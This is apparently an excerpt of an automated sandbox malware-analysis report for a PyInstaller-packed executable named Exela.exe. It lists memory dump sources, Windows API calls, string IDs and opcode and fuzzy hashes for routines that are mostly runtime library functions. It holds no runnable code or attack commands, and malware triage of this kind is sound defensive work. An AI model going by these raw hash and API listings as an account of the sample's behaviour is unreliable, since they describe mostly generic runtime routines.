                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentMessageProcess
                                                                                                    • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                    • API String ID: 1672936522-3797743490
                                                                                                    • Opcode ID: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                    • Instruction ID: 5a7828566d2126cd1d65a2fd55e8acbe7a6927e22cbef60365649d5fa86da71a
                                                                                                    • Opcode Fuzzy Hash: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                    • Instruction Fuzzy Hash: 5D21AE62B08B5196F720BB14F8467EAA3A4FF88780F844136EE8D57759EE3CD605C750
                                                                                                    APIs
                                                                                                    • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF75AE91B99), ref: 00007FF75AE92760
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentProcess
                                                                                                    • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                    • API String ID: 2050909247-1591803126
                                                                                                    • Opcode ID: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                    • Instruction ID: 69ae4843d4b8edf228c67872d48751448eeab6a042949abcefdd71ae468921de
                                                                                                    • Opcode Fuzzy Hash: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                    • Instruction Fuzzy Hash: 4521AE32A18B9196F720FB50B8867E6A3A4EF88384F884171FE8C53659DF3CD5458750
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                    • Opcode ID: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                                                                    • Instruction ID: a1072ec89668f8278928c6cadc224fb97ae77f5b3bbdcb8454deec88d1f64dd4
                                                                                                    • Opcode Fuzzy Hash: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                                                                    • Instruction Fuzzy Hash: 33F06221B09B1A81FB10BB24E45A37AA320EF49761F9C47B5C67E462F4DF2CD444C364
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _set_statfp
                                                                                                    • String ID:
                                                                                                    • API String ID: 1156100317-0
                                                                                                    • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                    • Instruction ID: 096d61439cbb509755554546ccff3729beeb84aa50cc365daa6e78b9063f459d
                                                                                                    • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                    • Instruction Fuzzy Hash: 9911BF62E1CB3B41F65431A4D4DF3B9A0446F5A360F8C4BB4EA6E062D68F2CAC4142A4
                                                                                                    APIs
                                                                                                    • FlsGetValue.KERNEL32(?,?,?,00007FF75AEAA613,?,?,00000000,00007FF75AEAA8AE,?,?,?,?,?,00007FF75AEAA83A), ref: 00007FF75AEAB41F
                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF75AEAA613,?,?,00000000,00007FF75AEAA8AE,?,?,?,?,?,00007FF75AEAA83A), ref: 00007FF75AEAB43E
                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF75AEAA613,?,?,00000000,00007FF75AEAA8AE,?,?,?,?,?,00007FF75AEAA83A), ref: 00007FF75AEAB466
                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF75AEAA613,?,?,00000000,00007FF75AEAA8AE,?,?,?,?,?,00007FF75AEAA83A), ref: 00007FF75AEAB477
                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF75AEAA613,?,?,00000000,00007FF75AEAA8AE,?,?,?,?,?,00007FF75AEAA83A), ref: 00007FF75AEAB488
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Value
                                                                                                    • String ID:
                                                                                                    • API String ID: 3702945584-0
                                                                                                    • Opcode ID: e370891a427e995cf622d6c66c6ae617f18e5219a23357883517039299fedc16
                                                                                                    • Instruction ID: 4a939da0c258c316aa3a161b0d7937b10bdc9bdad022bd1f95d20fae419fbcee
                                                                                                    • Opcode Fuzzy Hash: e370891a427e995cf622d6c66c6ae617f18e5219a23357883517039299fedc16
                                                                                                    • Instruction Fuzzy Hash: 56118E20F0C67241FA58B322A6AB179E1425F847B0FCC83B4E87D476D6EE2CEC018321
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Value
                                                                                                    • String ID:
                                                                                                    • API String ID: 3702945584-0
                                                                                                    • Opcode ID: e449caa10890978289f0fc2f631dee428fb70040431ae2bf3103bb36de88fb08
                                                                                                    • Instruction ID: d96abdc1735e9a3c48c83000acd533ad98f74161f52f259a83581d19505135f5
                                                                                                    • Opcode Fuzzy Hash: e449caa10890978289f0fc2f631dee428fb70040431ae2bf3103bb36de88fb08
                                                                                                    • Instruction Fuzzy Hash: AB111520E0926781FA687326646B2BA91824F46720FCC87B4D97E4A2C2DD2CB8118331
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID: verbose
                                                                                                    • API String ID: 3215553584-579935070
                                                                                                    • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                    • Instruction ID: 4aa6e6e2902e37364334a322745afdda62c925a9819adc53e0bd3a7edee81c7c
                                                                                                    • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                    • Instruction Fuzzy Hash: 8491DE32A08A6681F760BE28D45A37DBA91AF43B94FCC4176DA9E433D5DF3CE4458320
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                    • API String ID: 3215553584-1196891531
                                                                                                    • Opcode ID: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                    • Instruction ID: 3fb4a9350b19ca4c4786fef75e800bbffc3706ca0406780962aaeea97991470e
                                                                                                    • Opcode Fuzzy Hash: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                    • Instruction Fuzzy Hash: 3A81C332E0C26385F7657F29811A378B7A0AF11B58FDE80B5DA4997295DF2DE901C321
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                    • String ID: csm
                                                                                                    • API String ID: 2395640692-1018135373
                                                                                                    • Opcode ID: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                    • Instruction ID: d92ca4346882baa35e7908e1d2c455b35271a8e0a8c466933c98df6c9e3f8777
                                                                                                    • Opcode Fuzzy Hash: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                    • Instruction Fuzzy Hash: A651A032B197228EFB24BB15E485A78A391EF44B98F988170DA4E43749DF3CE841C720
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                    • String ID: csm$csm
                                                                                                    • API String ID: 3896166516-3733052814
                                                                                                    • Opcode ID: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                                                                    • Instruction ID: 14071bf1999c45793bad5e3388ea55c069f67863c66b170a2190b701d1962f94
                                                                                                    • Opcode Fuzzy Hash: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                                                                    • Instruction Fuzzy Hash: 5451A0729083A28EFB64BE219146B68B6A4FF54B94F9C8275DA4C47799CF3CE850C710
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CallEncodePointerTranslator
                                                                                                    • String ID: MOC$RCC
                                                                                                    • API String ID: 3544855599-2084237596
                                                                                                    • Opcode ID: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                                                                    • Instruction ID: 540c196a548f2c856d508b08e40695b6f8c67d2960c60530a10d583b4ea8d961
                                                                                                    • Opcode Fuzzy Hash: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                                                                    • Instruction Fuzzy Hash: 1D61D232908BD589EB20AB15E4427AAF7A0FF84B84F484275EB9C03B95DF7CD190CB50
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message
                                                                                                    • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                    • API String ID: 2030045667-255084403
                                                                                                    • Opcode ID: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                    • Instruction ID: 378633b91a65d3ab7784f3fcee03ea6a5e1a46a3dc1440622e7e93e0a444ff59
                                                                                                    • Opcode Fuzzy Hash: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                    • Instruction Fuzzy Hash: DB21D162B08B5196F720BB14F8467EAA3A0FF88780F844136EE8D57755DE3CD645C710
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                    • String ID:
                                                                                                    • API String ID: 2718003287-0
                                                                                                    • Opcode ID: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                    • Instruction ID: c028abf86631ec4877a2939a4b8d6839013e72de22922ae285f6860ac433dc72
                                                                                                    • Opcode Fuzzy Hash: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                    • Instruction Fuzzy Hash: 58D14472B08A948AF710EFA4D4451BC77B1FF84798B888275DE5EA7B89DE38D406C310
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LongWindow$DialogInvalidateRect
                                                                                                    • String ID:
                                                                                                    • API String ID: 1956198572-0
                                                                                                    • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                    • Instruction ID: 2a07edad9a2e8a70f95aa7004c0bb2339cfd1536b19b8aa65725e6adeb578c8c
                                                                                                    • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                    • Instruction Fuzzy Hash: C411E921B0C26646FA54B76AE54A6BA9292FF84780FCC8170DF4907B99DE2DD8D58210
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                    • String ID: ?
                                                                                                    • API String ID: 1286766494-1684325040
                                                                                                    • Opcode ID: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
                                                                                                    • Instruction ID: 10508e4130a64dee4c09c864dfcac040f3ce2068d20b96f0d6ca43f1a55b4730
                                                                                                    • Opcode Fuzzy Hash: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
                                                                                                    • Instruction Fuzzy Hash: 41412A32A083AA41F760BB15A44A379D651EF80BA4F584375EE5D06AD5DF3CD8428B20
                                                                                                    APIs
                                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 00007FF75AEA90B6
                                                                                                      • Part of subcall function 00007FF75AEAA9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF75AEB2D92,?,?,?,00007FF75AEB2DCF,?,?,00000000,00007FF75AEB3295,?,?,?,00007FF75AEB31C7), ref: 00007FF75AEAA9CE
                                                                                                      • Part of subcall function 00007FF75AEAA9B8: GetLastError.KERNEL32(?,?,?,00007FF75AEB2D92,?,?,?,00007FF75AEB2DCF,?,?,00000000,00007FF75AEB3295,?,?,?,00007FF75AEB31C7), ref: 00007FF75AEAA9D8
                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF75AE9CC15), ref: 00007FF75AEA90D4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                    • String ID: C:\Users\user~1\AppData\Local\Temp\Exela.exe
                                                                                                    • API String ID: 3580290477-3619601554
                                                                                                    • Opcode ID: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
                                                                                                    • Instruction ID: 81401ee1183dc8aa3e7d0b25a36fc2ac9f1b17f6b02db8872a4e0628b7ebc2ae
                                                                                                    • Opcode Fuzzy Hash: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
                                                                                                    • Instruction Fuzzy Hash: BA418236A08B2286FB54FF25A8960BDA794EF447D4FDD8075EA4D43B85DE3CE4818360
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLastWrite
                                                                                                    • String ID: U
                                                                                                    • API String ID: 442123175-4171548499
                                                                                                    • Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                    • Instruction ID: 8fd12d45e55f955855692987b5b4a5ae8a71d04723048270c4213641927f796d
                                                                                                    • Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                    • Instruction Fuzzy Hash: 3E41E332B18B5585EB20BF65E4493AAA760FF88784F884035EE4D97B88EF3CD401C750
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
